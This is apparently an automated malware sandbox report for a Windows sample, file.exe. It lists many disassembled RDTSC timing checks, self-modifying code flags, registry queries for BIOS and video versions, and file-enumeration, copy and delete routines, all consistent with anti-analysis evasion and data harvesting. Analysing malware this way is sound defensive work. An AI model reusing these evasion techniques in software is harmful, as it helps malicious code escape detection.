                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4531 second address: DF454B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F66B07B4FB6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF454B second address: DF4570 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a pushad 0x0000000b jmp 00007F66B1272F68h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4619 second address: DF461F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF461F second address: DF4642 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jg 00007F66B1272F56h 0x00000011 jmp 00007F66B1272F5Eh 0x00000016 popad 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4AFF second address: DF4B03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4C37 second address: DF4C46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B1272F5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4CEE second address: DF4D22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jnc 00007F66B07B4FA6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 jns 00007F66B07B4FA6h 0x00000019 popad 0x0000001a jmp 00007F66B07B4FB1h 0x0000001f popad 0x00000020 mov eax, dword ptr [esp+04h] 0x00000024 push ecx 0x00000025 push esi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4D22 second address: DF4D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F66B1272F58h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4D34 second address: DF4D61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F66B07B4FB7h 0x00000008 jbe 00007F66B07B4FA6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4D61 second address: DF4D65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4D65 second address: DF4D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4E25 second address: DF4E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4E35 second address: DF4E3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4FC7 second address: DF4FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF537A second address: DF537F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF537F second address: DF53E6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F66B1272F64h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push esi 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop esi 0x00000014 nop 0x00000015 mov cx, bx 0x00000018 push 0000001Eh 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007F66B1272F58h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 mov edx, dword ptr [ebp+122D2E9Ah] 0x0000003a nop 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F66B1272F66h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF5598 second address: DF559E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF5820 second address: DDF122 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B1272F5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b jno 00007F66B1272F74h 0x00000011 nop 0x00000012 mov dword ptr [ebp+122D1F8Eh], eax 0x00000018 call dword ptr [ebp+122D1FBFh] 0x0000001e pushad 0x0000001f jmp 00007F66B1272F5Fh 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F66B1272F65h 0x0000002b js 00007F66B1272F56h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3E15B second address: E3E167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3E167 second address: E3E189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F66B1272F65h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3E189 second address: E3E18D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3E5AB second address: E3E5CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F66B1272F68h 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007F66B1272F60h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3E5CB second address: E3E5D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 js 00007F66B07B4FA6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3E8CB second address: E3E8E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66B1272F61h 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4206B second address: E42071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E42071 second address: E420A1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F66B1272F56h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F66B1272F69h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jc 00007F66B1272F8Bh 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E420A1 second address: E420C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66B07B4FB9h 0x00000009 jo 00007F66B07B4FA6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E43FD1 second address: E43FEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F66B1272F56h 0x0000000a jmp 00007F66B1272F61h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E43FEC second address: E43FF2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E48EDE second address: E48EE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E48603 second address: E48607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E48786 second address: E4878C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4EAC1 second address: E4EAD1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F66B07B4FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4EAD1 second address: E4EAD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4EAD9 second address: E4EADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4EADF second address: E4EAE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4EAE5 second address: E4EAEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4EAEA second address: E4EAFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B1272F60h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D2FC second address: E4D30A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F66B07B4FA6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D30A second address: E4D32E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F66B1272F69h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D32E second address: E4D334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D4AF second address: E4D4B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D4B5 second address: E4D4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D4B9 second address: E4D4BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D4BF second address: E4D4EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jng 00007F66B07B4FA6h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 jp 00007F66B07B4FA6h 0x00000019 jmp 00007F66B07B4FB5h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D4EF second address: E4D4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D4F9 second address: E4D4FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D4FF second address: E4D50B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D682 second address: E4D686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D686 second address: E4D6B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B1272F63h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F66B1272F61h 0x00000011 jmp 00007F66B1272F5Bh 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D6B3 second address: E4D6E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F66B07B4FB6h 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 jng 00007F66B07B4FA6h 0x00000016 pop esi 0x00000017 pushad 0x00000018 jmp 00007F66B07B4FABh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D6E9 second address: E4D6F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D6F0 second address: E4D6F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D98D second address: E4D994 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D994 second address: E4D9A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F66B07B4FA6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF5184 second address: DF5216 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F66B1272F6Fh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F66B1272F58h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov ebx, dword ptr [ebp+12486209h] 0x0000002d push ebx 0x0000002e pop ecx 0x0000002f add eax, ebx 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007F66B1272F58h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 0000001Dh 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b mov edx, 52E54F59h 0x00000050 mov edx, dword ptr [ebp+122D29C6h] 0x00000056 mov dword ptr [ebp+122D2F22h], ebx 0x0000005c nop 0x0000005d js 00007F66B1272F64h 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF5216 second address: DF521A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4DC56 second address: E4DC5C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4DC5C second address: E4DC67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F66B07B4FA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4DC67 second address: E4DC73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F66B1272F56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4DC73 second address: E4DC7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4E792 second address: E4E79A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E52858 second address: E5285C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5285C second address: E5286B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jg 00007F66B1272F56h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E52070 second address: E52095 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F66B07B4FBBh 0x00000008 jc 00007F66B07B4FA6h 0x0000000e jmp 00007F66B07B4FAFh 0x00000013 ja 00007F66B07B4FACh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E521DF second address: E521E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E521E5 second address: E521EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E521EB second address: E521EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E521EF second address: E521F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5AE50 second address: E5AE56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5AE56 second address: E5AE5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E590E4 second address: E590EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E59286 second address: E5928E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5928E second address: E59299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E59299 second address: E592A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F66B07B4FA6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5952F second address: E59540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66B1272F5Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E59D80 second address: E59D84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E59D84 second address: E59D91 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E59D91 second address: E59D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: C41C2F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: C3F5CA instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E12944 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: DF45BA instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E73DA9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009F38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009F4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009EDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009EE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009EED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009F4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009EF68A FindFirstFileA
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009EF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009F3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009E16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009EDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009EBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
